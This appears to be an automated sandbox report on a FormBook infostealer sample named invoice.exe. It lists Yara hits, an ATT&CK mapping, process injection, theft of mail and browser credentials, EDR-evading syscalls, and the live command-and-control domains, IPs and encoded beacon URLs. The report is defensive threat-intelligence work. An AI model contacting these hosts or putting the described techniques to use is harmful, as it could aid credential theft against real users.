            Source: invoice.exeBinary or memory string: WIN_7
            Source: invoice.exeBinary or memory string: WIN_8
            Source: invoice.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.3576495613.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3575236547.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1867193556.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3576582157.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3576662143.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1867580811.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3576480081.0000000002850000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1867970632.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FF6399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00FF6399
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FF685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00FF685D

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            Scheduled Task/Job            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		2
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
            Scheduled Task/Job            		2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1510744 Sample: invoice.exe Startdate: 13/09/2024 Architecture: WINDOWS Score: 100 28 www.syvra.xyz 2->28 30 www.zhuoyueapp.top 2->30 32 17 other IPs or domains 2->32 42 Multi AV Scanner detection for domain / URL 2->42 44 Suricata IDS alerts for network traffic 2->44 46 Malicious sample detected (through community Yara rule) 2->46 50 8 other signatures 2->50 10 invoice.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 usnnduqerdgHbr.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 at.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 usnnduqerdgHbr.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 easyanalytics.site 162.241.226.190, 50426, 50427, 50428 UNIFIEDLAYER-AS-1US United States 22->34 36 www.subitoadomicilio.shop 195.24.68.25, 50402, 50403, 50404 RU-CENTERRU Russian Federation 22->36 38 7 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            invoice.exe24%ReversingLabsWin32.Trojan.Leonem
            invoice.exe31%VirustotalBrowse
            invoice.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            easyanalytics.site1%VirustotalBrowse
            hm62t.top2%VirustotalBrowse
            kalomor.top5%VirustotalBrowse
            www.zhuoyueapp.top1%VirustotalBrowse
            www.hm62t.top2%VirustotalBrowse
            www.route4.org0%VirustotalBrowse
            www.teksales.space7%VirustotalBrowse
            www.syvra.xyz1%VirustotalBrowse
            www.subitoadomicilio.shop0%VirustotalBrowse
            56.126.166.20.in-addr.arpa1%VirustotalBrowse
            www.dom-2.online0%VirustotalBrowse
            www.kalomor.top5%VirustotalBrowse
            www.meery.store0%VirustotalBrowse
            www.easyanalytics.site1%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.subitoadomicilio.shop/x7sd/?EB04T=0hSTF8phw&MtXH8dRH=xxifBtz+TGalALhNcyBTN44Pt4/Sbh2VoP/cWgYTPpbNJICDVfxFhRGjE7kr1iNtdvbH3kOKnhtRMn3Y82SlrP3cRd6my2NsPT3JF2gfd9Xq5l5DKuckTiI=0%Avira URL Cloudsafe
            http://www.dom-2.online/m409/?MtXH8dRH=vgT3vdiL6XmHyQpuqznGmu4w6V9vwAtJ/QiZ74rQqCLiqTobayGplqDkxFD969c96YoECNzKpiIWNF3RdO36GE5+Hjm0BUXOD0JGo2GVPeYBG+tw9V1xstM=&EB04T=0hSTF8phw0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            https://kb.fastpanel.direct/troubleshoot/0%Avira URL Cloudsafe
            http://www.syvra.xyz/h2bb/0%Avira URL Cloudsafe
            http://www.hm62t.top/edpl/0%Avira URL Cloudsafe
            http://www.hm62t.top/edpl/?MtXH8dRH=q/xbqOJEbFxqZdP5Pq3VIJihKFYuoTJpC6d7rXUvusGBValkv/SoX8DUGkqJst/hxOtwmyY8Q6nb8zkY9ZrFeAmdQleBPpTMkSiDA6E42mjQ0ujKW4BvX8M=&EB04T=0hSTF8phw0%Avira URL Cloudsafe
            http://www.zhuoyueapp.top/6m23/0%Avira URL Cloudsafe
            http://www.syvra.xyz/h2bb/1%VirustotalBrowse
            https://www.google.com0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
            http://www.kalomor.top/1i25/?MtXH8dRH=hvoPcElTJ0Y3piwLtjSln1mmdkYNLw6anL/4ADmEhhaGoTcu5w6VaNtYttD808rfRbfsmOcnHjc3Cl4jYjdANHGjovYJiL0/kcRCteZsHg47/gztzPUw9dw=&EB04T=0hSTF8phw100%Avira URL Cloudmalware
            http://www.dom-2.online/m409/0%Avira URL Cloudsafe
            http://www.hm62t.top/edpl/2%VirustotalBrowse
            http://www.kalomor.top/1i25/100%Avira URL Cloudmalware
            http://www.autonashville.com/7d10/0%Avira URL Cloudsafe
            https://www.aapanel.com/new/download.html?invite_code=aapanele0%Avira URL Cloudsafe
            https://www.google.com0%VirustotalBrowse
            http://www.easyanalytics.site/21tc/0%Avira URL Cloudsafe
            http://www.zhuoyueapp.top/6m23/1%VirustotalBrowse
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            http://www.route4.org/65ev/?MtXH8dRH=dwwIBvsgoPduu1x03LiLu+lQGDFRz/zz5BoPsCvlGePibN32srUYcBSr/DN58z3DeItGY9KIy82Fautrr2SZe1nede/ReFPQiUe32Ik0HHEAi+oCxkmAYmk=&EB04T=0hSTF8phw0%Avira URL Cloudsafe
            http://www.easyanalytics.site/21tc/?MtXH8dRH=dZthOjk/1dPqZuqAGh/VZ5JieneFrO0O+sFz5UfhqKDq1IpY9KHnH85jTOrt8bOMtDp+Wqm6lvqy9EKuTgvz+0mfPUCSMg+fwe3gbMHC32F4Yn2Fr4fx3Q4=&EB04T=0hSTF8phw0%Avira URL Cloudsafe
            http://www.subitoadomicilio.shop/x7sd/0%Avira URL Cloudsafe
            http://www.kalomor.top100%Avira URL Cloudmalware
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%VirustotalBrowse
            http://www.autonashville.com/7d10/?MtXH8dRH=xmIOFBiXVr0/QiBtlfppycp69g4gIKv/lNzUf7vC8zcE0nFiYZS2LM+232gpuz68llXfjA35BroI76gEmief8pSzBK3ZVT8efzXjLgbijVAA5nUksQudIw0=&EB04T=0hSTF8phw0%Avira URL Cloudsafe
            http://www.syvra.xyz/h2bb/?MtXH8dRH=qJKXiU3Y6HiR5EQ+73Yb2xdirYIwqZi0pOwD+eljRGtAAZDjMN2OxhxU5kptMPcWm3rk9DqOdiozjqcfWB2Wk1O1f7az6dmfaFVy77DKkP1oB1oCVi4cG1g=&EB04T=0hSTF8phw0%Avira URL Cloudsafe
            http://www.kalomor.top5%VirustotalBrowse
            http://www.subitoadomicilio.shop/x7sd/1%VirustotalBrowse
            https://www.aapanel.com/new/download.html?invite_code=aapanele0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            easyanalytics.site
            		162.241.226.190
            		truetrueunknown
            hm62t.top
            		154.23.184.240
            		truetrueunknown
            kalomor.top
            		91.215.85.23
            		truetrueunknown
            www.zhuoyueapp.top
            		47.104.180.139
            		truetrueunknown
            autonashville.com
            		3.33.130.190
            		truetrue
              		unknown
              www.syvra.xyz
              		162.0.213.94
              		truetrueunknown
              www.route4.org
              		34.150.58.73
              		truetrueunknown
              www.subitoadomicilio.shop
              		195.24.68.25
              		truetrueunknown
              www.dom-2.online
              		199.59.243.226
              		truetrueunknown
              www.kalomor.top
              		unknown
              		unknowntrueunknown
              www.hm62t.top
              		unknown
              		unknowntrueunknown
              56.126.166.20.in-addr.arpa
              		unknown
              		unknowntrueunknown
              www.teksales.space
              		unknown
              		unknowntrueunknown
              www.pelus-pijama-pro.shop
              		unknown
              		unknowntrue
                		unknown
                www.linkbasic.net
                		unknown
                		unknowntrue
                  		unknown
                  www.autonashville.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.easyanalytics.site
                    		unknown
                    		unknowntrueunknown
                    www.meery.store
                    		unknown
                    		unknowntrueunknown
                    www.torkstallningar.shop
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://www.subitoadomicilio.shop/x7sd/?EB04T=0hSTF8phw&MtXH8dRH=xxifBtz+TGalALhNcyBTN44Pt4/Sbh2VoP/cWgYTPpbNJICDVfxFhRGjE7kr1iNtdvbH3kOKnhtRMn3Y82SlrP3cRd6my2NsPT3JF2gfd9Xq5l5DKuckTiI=true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.dom-2.online/m409/?MtXH8dRH=vgT3vdiL6XmHyQpuqznGmu4w6V9vwAtJ/QiZ74rQqCLiqTobayGplqDkxFD969c96YoECNzKpiIWNF3RdO36GE5+Hjm0BUXOD0JGo2GVPeYBG+tw9V1xstM=&EB04T=0hSTF8phwtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.syvra.xyz/h2bb/true
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.hm62t.top/edpl/true
                      • 2%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.hm62t.top/edpl/?MtXH8dRH=q/xbqOJEbFxqZdP5Pq3VIJihKFYuoTJpC6d7rXUvusGBValkv/SoX8DUGkqJst/hxOtwmyY8Q6nb8zkY9ZrFeAmdQleBPpTMkSiDA6E42mjQ0ujKW4BvX8M=&EB04T=0hSTF8phwtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.zhuoyueapp.top/6m23/true
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.kalomor.top/1i25/?MtXH8dRH=hvoPcElTJ0Y3piwLtjSln1mmdkYNLw6anL/4ADmEhhaGoTcu5w6VaNtYttD808rfRbfsmOcnHjc3Cl4jYjdANHGjovYJiL0/kcRCteZsHg47/gztzPUw9dw=&EB04T=0hSTF8phwtrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.dom-2.online/m409/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.kalomor.top/1i25/true
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.autonashville.com/7d10/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.easyanalytics.site/21tc/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.easyanalytics.site/21tc/?MtXH8dRH=dZthOjk/1dPqZuqAGh/VZ5JieneFrO0O+sFz5UfhqKDq1IpY9KHnH85jTOrt8bOMtDp+Wqm6lvqy9EKuTgvz+0mfPUCSMg+fwe3gbMHC32F4Yn2Fr4fx3Q4=&EB04T=0hSTF8phwtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.route4.org/65ev/?MtXH8dRH=dwwIBvsgoPduu1x03LiLu+lQGDFRz/zz5BoPsCvlGePibN32srUYcBSr/DN58z3DeItGY9KIy82Fautrr2SZe1nede/ReFPQiUe32Ik0HHEAi+oCxkmAYmk=&EB04T=0hSTF8phwtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.subitoadomicilio.shop/x7sd/true
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.autonashville.com/7d10/?MtXH8dRH=xmIOFBiXVr0/QiBtlfppycp69g4gIKv/lNzUf7vC8zcE0nFiYZS2LM+232gpuz68llXfjA35BroI76gEmief8pSzBK3ZVT8efzXjLgbijVAA5nUksQudIw0=&EB04T=0hSTF8phwtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.syvra.xyz/h2bb/?MtXH8dRH=qJKXiU3Y6HiR5EQ+73Yb2xdirYIwqZi0pOwD+eljRGtAAZDjMN2OxhxU5kptMPcWm3rk9DqOdiozjqcfWB2Wk1O1f7az6dmfaFVy77DKkP1oB1oCVi4cG1g=&EB04T=0hSTF8phwtrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabat.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://duckduckgo.com/ac/?q=at.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoat.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://kb.fastpanel.direct/troubleshoot/at.exe, 00000003.00000002.3577269049.000000000599E000.00000004.10000000.00040000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000002.3576985451.000000000437E000.00000004.00000001.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=at.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=at.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.ecosia.org/newtab/at.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://ac.ecosia.org/autocomplete?q=at.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.google.comat.exe, 00000003.00000002.3577269049.000000000567A000.00000004.10000000.00040000.00000000.sdmp, at.exe, 00000003.00000002.3579233466.0000000006B40000.00000004.00000800.00020000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000002.3576985451.000000000405A000.00000004.00000001.00040000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchat.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.aapanel.com/new/download.html?invite_code=aapaneleat.exe, 00000003.00000002.3577269049.0000000004858000.00000004.10000000.00040000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000002.3576985451.0000000003238000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2261440991.0000000010C68000.00000004.80000000.00040000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssat.exe, 00000003.00000002.3577269049.0000000004D0E000.00000004.10000000.00040000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000002.3576985451.00000000036EE000.00000004.00000001.00040000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.kalomor.topusnnduqerdgHbr.exe, 00000007.00000002.3576662143.000000000277B000.00000040.80000000.00040000.00000000.sdmptrue
                      • 5%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      		unknown
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=at.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      91.215.85.23
                      		kalomor.topRussian Federation
                      		34665PINDC-ASRUtrue
                      162.0.213.94
                      		www.syvra.xyzCanada
                      		35893ACPCAtrue
                      162.241.226.190
                      		easyanalytics.siteUnited States
                      		46606UNIFIEDLAYER-AS-1UStrue
                      34.150.58.73
                      		www.route4.orgUnited States
                      		2686ATGS-MMD-ASUStrue
                      195.24.68.25
                      		www.subitoadomicilio.shopRussian Federation
                      		48287RU-CENTERRUtrue
                      199.59.243.226
                      		www.dom-2.onlineUnited States
                      		395082BODIS-NJUStrue
                      154.23.184.240
                      		hm62t.topUnited States
                      		174COGENT-174UStrue
                      3.33.130.190
                      		autonashville.comUnited States
                      		8987AMAZONEXPANSIONGBtrue
                      47.104.180.139
                      		www.zhuoyueapp.topChina
                      		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1510744
                      Start date and time:2024-09-13 12:25:35 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 8m 53s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Run name:Run with higher sleep bypass
                      Number of analysed new started processes analysed:8
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:2
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:invoice.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@7/3@16/9
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 98%
                      • Number of executed functions: 50
                      • Number of non-executed functions: 273
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      06:27:22API Interceptor7537677x Sleep call for process: at.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      91.215.85.23Purchase order.exeGet hashmaliciousFormBookBrowse
                      • www.kalomor.top/6th3/
                      Remittance advice.exeGet hashmaliciousFormBookBrowse
                      • www.kalomor.top/6th3/
                      PO#86637.exeGet hashmaliciousFormBookBrowse
                      • www.kalomor.top/1i25/
                      Quote #011698.exeGet hashmaliciousFormBookBrowse
                      • www.kalomor.top/1i25/
                      PO#86637.exeGet hashmaliciousFormBookBrowse
                      • www.kalomor.top/1i25/
                      DHL airwaybill # 6913321715 & BL Draft copy.exeGet hashmaliciousFormBookBrowse
                      • www.kalomor.top/pf98/
                      PO#86637.exeGet hashmaliciousFormBookBrowse
                      • www.kalomor.top/1i25/
                      PO#86637.exeGet hashmaliciousFormBookBrowse
                      • www.kalomor.top/1i25/
                      PI 30_08_2024.exeGet hashmaliciousFormBookBrowse
                      • www.kalomor.top/1i25/
                      mAhetaoScY.exeGet hashmaliciousRedLine, SectopRATBrowse
                      • 91.215.85.23:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08
                      162.0.213.94r9856_7.exeGet hashmaliciousFormBookBrowse
                      • www.zimra.xyz/knrh/
                      PO#86637.exeGet hashmaliciousFormBookBrowse
                      • www.syvra.xyz/h2bb/
                      New Purchase Order.exeGet hashmaliciousFormBookBrowse
                      • www.kryto.top/09dt/?lt=rbfG5gS9WKSJFi6dUtliAmup1VBkpZqBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFZ5ISx4hWtAA8ETmF0fwXx3j+/89J/je5YeA=&3ry=nj20Xr
                      Scan 00093847.exeGet hashmaliciousFormBookBrowse
                      • www.kryto.top/09dt/
                      Quote #011698.exeGet hashmaliciousFormBookBrowse
                      • www.syvra.xyz/h2bb/
                      PO#86637.exeGet hashmaliciousFormBookBrowse
                      • www.syvra.xyz/h2bb/
                      PO#86637.exeGet hashmaliciousFormBookBrowse
                      • www.syvra.xyz/h2bb/
                      0XLuA614VK.exeGet hashmaliciousFormBookBrowse
                      • www.rigintech.info/ig9u/
                      RFQ- PNOC- MR 29215 - PJ 324 AL SAILIYA MOSQUE Project.exeGet hashmaliciousFormBookBrowse
                      • www.zyfro.info/hnng/
                      PO#86637.exeGet hashmaliciousFormBookBrowse
                      • www.syvra.xyz/h2bb/

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      www.zhuoyueapp.topPO#86637.exeGet hashmaliciousFormBookBrowse
                      • 47.104.180.139
                      Quote #011698.exeGet hashmaliciousFormBookBrowse
                      • 47.104.180.139
                      PO#86637.exeGet hashmaliciousFormBookBrowse
                      • 47.104.180.139
                      PO#86637.exeGet hashmaliciousFormBookBrowse
                      • 47.104.180.139
                      PO#86637.exeGet hashmaliciousFormBookBrowse
                      • 47.104.180.139
                      PI 30_08_2024.exeGet hashmaliciousFormBookBrowse
                      • 47.104.180.139
                      factura-630.900.exeGet hashmaliciousFormBookBrowse
                      • 47.104.180.139
                      PAGO $630.900.exeGet hashmaliciousFormBookBrowse
                      • 47.104.180.139

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      UNIFIEDLAYER-AS-1USFATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                      • 50.6.160.61
                      (No subject).emlGet hashmaliciousUnknownBrowse
                      • 192.185.13.17
                      https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fghrry.zapto.org%2Fsys%2Fccs%2FZszr3G66LgTGWx1MRNQ6eDZX/aXNjZGVsaGlAYnNlaW5kaWEuY29tGet hashmaliciousUnknownBrowse
                      • 192.185.13.17
                      https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fghrry.zapto.org%2Fsys%2Fccs%2FZszr3G66LgTGWx1MRNQ6eDZX/aXNjZGVsaGlAYnNlaW5kaWEuY29tGet hashmaliciousUnknownBrowse
                      • 192.185.13.17
                      intro.pdfGet hashmaliciousHTMLPhisherBrowse
                      • 162.241.115.47
                      http://scarce-army-wide.on-fleek.app/Get hashmaliciousHTMLPhisherBrowse
                      • 96.125.163.17
                      Play_VM-Now(Securustechnologies)CLQD.htmlGet hashmaliciousUnknownBrowse
                      • 108.167.172.137
